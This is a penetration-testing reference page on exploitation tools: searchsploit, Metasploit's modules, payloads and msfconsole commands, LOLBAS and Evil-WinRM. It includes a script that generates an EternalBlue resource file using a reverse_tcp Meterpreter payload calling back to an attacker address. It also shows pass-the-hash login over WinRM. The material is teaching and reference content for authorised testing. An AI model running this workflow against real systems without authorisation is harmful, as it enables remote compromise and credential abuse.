Tools and Utilities

This page collects tools and utilities commonly used during the exploitation phase of a penetration test:

Exploit DB

Searchsploit

  • Kali package for searching a local, offline copy of Exploit-DB from the command line

Commands

  • Installation

sudo apt install exploitdb

  • Usage (search the local database by keyword, typically product name and version)

searchsploit $Keywords

Metasploit

  • Exploitation framework with tools for every phase of pen-testing

Modules

  • Auxiliary: Any supporting module

  • Encoders: Re-encode the payload so it avoids bad characters (e.g. null bytes) and changes its byte signature; this can defeat naive signature-based antivirus but is not a reliable bypass

  • Evasion: For antivirus evasion

  • Exploits: Exploits, organized by target system

  • Nops: No-operation instructions that the CPU executes without effect; used to pad payloads to a consistent size and as NOP sleds that land execution safely on the shellcode

  • Payloads: Different payloads that can open shells on the target system

    • Adapters: Wrap an existing payload in a different form so it can be delivered through another vector (for example as a command-line or script wrapper)

    • Single: Also called inline; self-contained, no additional component needs to be downloaded to run

    • Stagers: Set up the connection between Metasploit and the target. The small stager is delivered first and then pulls the rest of the payload (the stage) down over that connection

    • Stages: Downloaded by the stager; because the stage is not constrained by the exploit's size limits, it can carry larger payloads such as Meterpreter

  • Post: For post-exploitation

Staged and single payloads are told apart by their names: a staged payload separates the stage from the handler with /, a single (inline) payload joins them with _.

Example: shell_reverse_tcp (single) vs shell/reverse_tcp (staged)
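The naming rule above, turned into a small POSIX shell helper. This is an added example, not code from the page or from Metasploit: it classifies a payload name as staged or single from the / vs _ convention and reports whether it is a reverse payload (needs LHOST/LPORT) or a bind payload (listens on the target). The list of stage names is an assumption covering the common stages, not an exhaustive one, and the payload names in the demonstration loop are constructed for illustration.

```shell
#!/bin/sh
# Classify Metasploit payload names by the "/" vs "_" convention.
# STAGES: common Metasploit stage names (assumption: not exhaustive).
STAGES="shell meterpreter vncinject dllinject upexec custom"

# payload_kind NAME -> prints "staged" or "single"
payload_kind() {
  name=$1
  last=${name##*/}      # final component, e.g. reverse_tcp or shell_reverse_tcp
  rest=${name%/*}       # path with the final component removed
  penult=${rest##*/}    # component before the final one, e.g. meterpreter
  for stage in $STAGES; do
    # stage and handler as separate components -> staged (stager fetches the stage)
    [ "$penult" = "$stage" ] && { echo staged; return 0; }
    # stage_handler joined in one component -> single (inline, self-contained)
    case $last in "${stage}_"*) echo single; return 0 ;; esac
  done
  echo single   # no stage at all (e.g. cmd/unix/reverse_bash): a one-piece payload
}

# payload_direction NAME -> "reverse" (connects back, needs LHOST/LPORT)
#                           or "bind" (opens a listener on the target)
payload_direction() {
  case ${1##*/} in
    *reverse*) echo reverse ;;
    *bind*)    echo bind ;;
    *)         echo unknown ;;
  esac
}

# Demonstration on the page's example plus a few constructed names
for p in shell_reverse_tcp shell/reverse_tcp windows/x64/meterpreter/reverse_https \
         linux/x64/meterpreter_reverse_https cmd/unix/reverse_bash windows/shell/bind_tcp; do
  printf '%-40s %-7s %s\n' "$p" "$(payload_kind "$p")" "$(payload_direction "$p")"
done
```

The direction matters when filling in the common parameters: a reverse payload needs LHOST and LPORT set to the attacking machine, while a bind payload only needs the target address and the port it will listen on.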

Common parameters

  • RHOSTS: IP address of the target system (also accepts ranges and a file of targets)

  • RPORT: Port on the target system the vulnerable application is running on

  • PAYLOAD: Payload that will be used with the exploit

  • LHOST: Attacking machine (local) IP address

  • LPORT: Local port the reverse shell connects back to

  • SESSION: Session ID of the connection with Metasploit. Used with post-exploitation modules connected to the target system

Commands

  • Installation

sudo apt install metasploit-framework

  • Start the console

msfconsole
msf6 > sessions         #List all sessions
msf6 > sessions -i $id  #Interact with a session

  • List modules

tree -L 1 /usr/share/metasploit-framework/modules        #Types
tree -L 1 /usr/share/metasploit-framework/modules/$type  #Specific module type

  • Search module

msf6 > search $query             #Search modules
msf6 > use $queryNumber          #Use a module from the last search list (0 is the first)
msf6 > search type:$type $query  #Filter by a specific module type

The query value can be a keyword, a CVE number, an exploit/module name or a target system (e.g. search type:exploit platform:windows smb)


  • Usage

msf6 > use $modulePath
# This enters the module's context; example below
msf6 > use exploit/windows/smb/ms17_010_eternalblue     #The exploit used
msf6 exploit(windows/smb/ms17_010_eternalblue) >        #The prompt now shows the module context

msf6 exploit(...) > info             #Display information about the module (prompt abbreviated from here on)
msf6 exploit(...) > show options     #Display the options of the current context
msf6 exploit(...) > show payloads    #Display the payloads compatible with the exploit
msf6 exploit(...) > show $type       #Works with every module type (exploits, auxiliary, post, ...)

msf6 exploit(...) > set $parameter $value  #Set a parameter in the current context
msf6 exploit(...) > unset $parameter       #Unset a parameter
msf6 exploit(...) > unset all              #Unset all parameters
msf6 exploit(...) > setg $parameter $value #Set a parameter globally (e.g. LHOST), kept across modules
msf6 exploit(...) > unsetg $parameter      #Unset a global parameter

msf6 exploit(...) > check       #Check whether the target is vulnerable without exploiting it (not every module implements it)
msf6 exploit(...) > exploit     #Run the exploit
msf6 exploit(...) > run         #Same as exploit
msf6 exploit(...) > exploit -z  #Run the exploit and background the session instead of interacting with it
msf6 exploit(...) > back        #Leave the module context

meterpreter > background  #From inside a session: background it and return to msfconsole (CTRL+Z also works)
meterpreter > $commands   #If the exploit succeeds with a Meterpreter payload the prompt changes to meterpreter and its own commands apply; a plain shell payload gives the target's shell instead
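The interactive sequence above (use, set, check, exploit -z, sessions) can be replayed non-interactively with a resource script, which msfconsole runs with `msfconsole -q -r FILE`. The generator below is an added example, not code from the page or from Metasploit; the module, payload, addresses and ports passed to it are constructed placeholders, and the output path is an assumption.

```shell
#!/bin/sh
# Generate an msfconsole resource script that replays the interactive workflow.
# Run the result with:  msfconsole -q -r FILE
# Note that a resource script keeps going line by line, so a failed "check" does
# not stop "exploit -z"; review the check output before trusting the session list.

# write_rc FILE MODULE PAYLOAD RHOSTS RPORT LHOST LPORT
write_rc() {
  file=$1 module=$2 payload=$3 rhosts=$4 rport=$5 lhost=$6 lport=$7
  cat > "$file" <<EOF
setg LHOST $lhost
setg LPORT $lport
use $module
set PAYLOAD $payload
set RHOSTS $rhosts
set RPORT $rport
show options
check
exploit -z
sessions -l
EOF
}

# rc_commands FILE -> number of commands in the generated script (quick sanity check)
rc_commands() {
  grep -c . "$1"
}

# Example with constructed values: target 10.10.10.40:445, attacker 10.10.14.5:4444
write_rc "${TMPDIR:-/tmp}/eternalblue.rc" exploit/windows/smb/ms17_010_eternalblue \
  windows/x64/meterpreter/reverse_tcp 10.10.10.40 445 10.10.14.5 4444
cat "${TMPDIR:-/tmp}/eternalblue.rc"
```

LHOST and LPORT are set with setg so that they remain in place if the script is extended with further modules; exploit -z backgrounds the session so the script can go on to list it.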

Payloads for Everything

A repository that contains payloads for diverse purposes and attacks

LOLBAS

Living Off The Land Binaries, Scripts and Libraries: a catalogue of built-in Windows binaries and scripts that can be abused for attacker tasks such as downloading, execution and bypasses

Evil-WinRM

Tool that gives an interactive PowerShell session on a Windows host over WinRM (TCP 5985, or 5986 with SSL). Besides a password it also accepts an NTLM hash (-H) for pass-the-hash

  • Install

sudo apt install evil-winrm

  • Access to WinRM (no root needed; add -S for SSL on 5986)

evil-winrm -i $ip -u $user -p $password
